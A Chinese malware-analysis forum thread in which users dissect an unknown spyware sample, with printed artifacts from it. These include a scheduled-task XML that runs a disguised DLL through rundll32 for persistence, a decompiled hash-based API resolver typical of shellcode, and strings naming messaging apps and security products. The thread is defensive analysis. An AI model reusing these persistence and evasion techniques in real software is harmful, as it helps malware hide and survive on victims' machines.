[UNICODE] 0x0000b5bc: users
[UNICODE] 0x0000b5e6: 耀整敬牧浡攮數
[UNICODE] 0x0000b5fe: 耀楄杮慔歬攮數
[UNICODE] 0x0000b616: 耀敔敬牧浡攮數
[UNICODE] 0x0000b636: 灰攮數s
[UNICODE] 0x0000b65e: 耀敔敬牧浡攮數
[UNICODE] 0x0000b6ee: 耀整敬牧浡攮數s
[UNICODE] 0x0000b70e: 灰攮數s
[UNICODE] 0x0000b754: users
[UNICODE] 0x0000b766: 耀楄杮慔歬攮數s
[UNICODE] 0x0000b77e: 耀楄杮慔歬攮數s
[UNICODE] 0x0000b7ae: 耀敔敬牧浡攮數
[UNICODE] 0x0000b7de: 耀楄杮慔歬攮數
[UNICODE] 0x0000b7fc: users
[UNICODE] 0x0000b826: 耀楄杮慔歬攮數
[UNICODE] 0x0000b844: users
[UNICODE] 0x0000b856: 耀楄杮慔歬攮數
[UNICODE] 0x0000b874: users
[UNICODE] 0x0000b88c: users

复制代码

[UNICODE] 0x00007b18: startOnIdle>false</RestartOnIdle>
[UNICODE] 0x00007b66: </IdleSettings>
[UNICODE] 0x00007b90: <AllowStartOnDem
[UNICODE] 0x00007c68: true</AllowStartOnDemand>
[UNICODE] 0x00007ca6: <Enabled>true</Enabled>
[UNICODE] 0x00007ce0: <Hidden>false</Hidden>
[UNICODE] 0x00007d18: <RunOnlyIfIdle>false</RunOnlyIfIdle>
[UNICODE] 0x00007d6c: <WakeToRun>false</WakeToRun>
[UNICODE] 0x00007db0: <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
[UNICODE] 0x00007e18: <Priority>7</Priority>
[UNICODE] 0x00007e4c: </Settings>
[UNICODE] 0x00007e6a: <Actions>
[UNICODE] 0x00007e88: <Exec>
[UNICODE] 0x00007ea4: <Command>rundll32.exe</Command>
[UNICODE] 0x00007ef2: <Arguments>C:\Users\PC\AppData\Roaming\Embarcadero\AutoRecoverDat.dll,DllRegisterServer</Arguments>
[UNICODE] 0x00007fc4: </Exec>
[UNICODE] 0x00007fda: </Actions>
[UNICODE] 0x00007ff2: </Task>

复制代码

显示全部楼层 · 发表于 2025-10-19 16:39:02

C:\Users\PC\AppData\Roaming\Embarcadero\GPUCache2.xml

// positive sp value has been detected, the output may be wrong!
__int64 __fastcall sub_AE4(int a1, __int64 a2, __int64 a3, char a4)
{
__int64 v4; // rax
int v5; // r11d
__int64 v6; // r12
unsigned __int64 v7; // rdi
unsigned int v8; // eax
int v9; // esi
unsigned int v10; // ebx
__int64 v11; // rbp
int v12; // esi
unsigned __int64 v13; // rax
int v14; // ebp
__int64 v15; // rdx
int v17; // [rsp-10h] [rbp-24h]
unsigned int v18; // [rsp-Ch] [rbp-20h]
unsigned int v19; // [rsp-8h] [rbp-1Ch]
LODWORD(v4) = __readfsdword(0x30u);
LOBYTE(v4) = v4 | 0x57;
v7 = *(unsigned int *)(v4 + 12);
while ( 1 )
{
LABEL_14:
v15 = *(unsigned int *)(v7 + 24);
if ( !(_DWORD)v15 )
return 0i64;
v8 = *(_DWORD *)(v7 + 48);
v9 = 0;
v10 = *(_DWORD *)(v7 + 44);
v7 = *(unsigned int *)v7;
v18 = v7;
v11 = *(unsigned int *)(*(unsigned int *)(v15 + 60) + v15 + 120);
v19 = v11;
if ( (_DWORD)v11 )
{
if ( HIWORD(v10) )
{
do
{
v12 = __ROR4__(v9, 13);
v17 = *(char *)v8;
if ( (char)v17 < 97 )
v9 = v17 + v12;
else
v9 = *(char *)v8 - 32 + v12;
}
while ( v5 );
v7 = (unsigned int)v7;
v11 = (unsigned int)v11;
}
v13 = (unsigned int)(v15 + *(_DWORD *)(v15 + v11 + 32));
if ( *(_DWORD *)(v15 + v11 + 24) )
break;
}
}
while ( 1 )
{
v14 = 0;
do
v14 = *(char *)(unsigned int)(v15 + *(_DWORD *)v13) + __ROR4__(v14, 13);
while ( a4 );
v7 = v18;
if ( v9 + v14 == a1 )
return (unsigned int)(v15
+ *(_DWORD *)(*(_DWORD *)(v19 + v15 + 28)
+ 4 * (unsigned int)*(unsigned __int16 *)(*(unsigned int *)(v19 + v15 + 36) + v15)
+ v15));
v13 = (unsigned int)(v13 + 4);
if ( !*(_DWORD *)((char *)&loc_10 + 2 * v6) )
goto LABEL_14;
}
}

复制代码

似乎是通过哈希值动态解析API导出函数地址的函数。
这马子模块化挺强，一个模块一个Shellcode bin文件

显示全部楼层 · 发表于 2025-10-19 18:33:54

wwwab 发表于 2025-10-19 16:26
dll用Enigma(5.X)加壳了，不好分析
一堆空名区段，应该容易被kill

这家伙好像是针对国内环境的小家伙，国内流行的安全软件进程都在其中啊，真是个搞事情的小家伙

显示全部楼层 · 发表于 2025-10-19 19:53:00

驭龙发表于 2025-10-19 18:33
这家伙好像是针对国内环境的小家伙，国内流行的安全软件进程都在其中啊，真是个搞事情的小家伙

很奇怪的是他在加载shellcode之前就有个判断是否有360的步骤但是那个过程中没有这一堆

似乎是两个不一样的逻辑

显示全部楼层 · 发表于 2025-10-19 20:01:31

神龟Turmi 发表于 2025-10-19 19:53
很奇怪的是他在加载shellcode之前就有个判断是否有360的步骤但是那个过程中没有这一堆
似乎是 ...

也有可能开发者不是一个人，而是东拼西凑的模块？这东西模块化有可能有的模块是搬运？然后就出现前后矛盾的情况？

显示全部楼层 · 发表于 2025-10-19 20:07:13

驭龙发表于 2025-10-19 20:01
也有可能开发者不是一个人，而是东拼西凑的模块？这东西模块化有可能有的模块是搬运？然后就出现前后矛盾 ...

看起来是的，所以我想知道这是什么家族，结果研究了一个下午都没研究明白
（基本排除winos 排除原版gh0strat 基本排除cobaltstrike）

[病毒样本] 未知Spyware #FakeAPP 1X

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分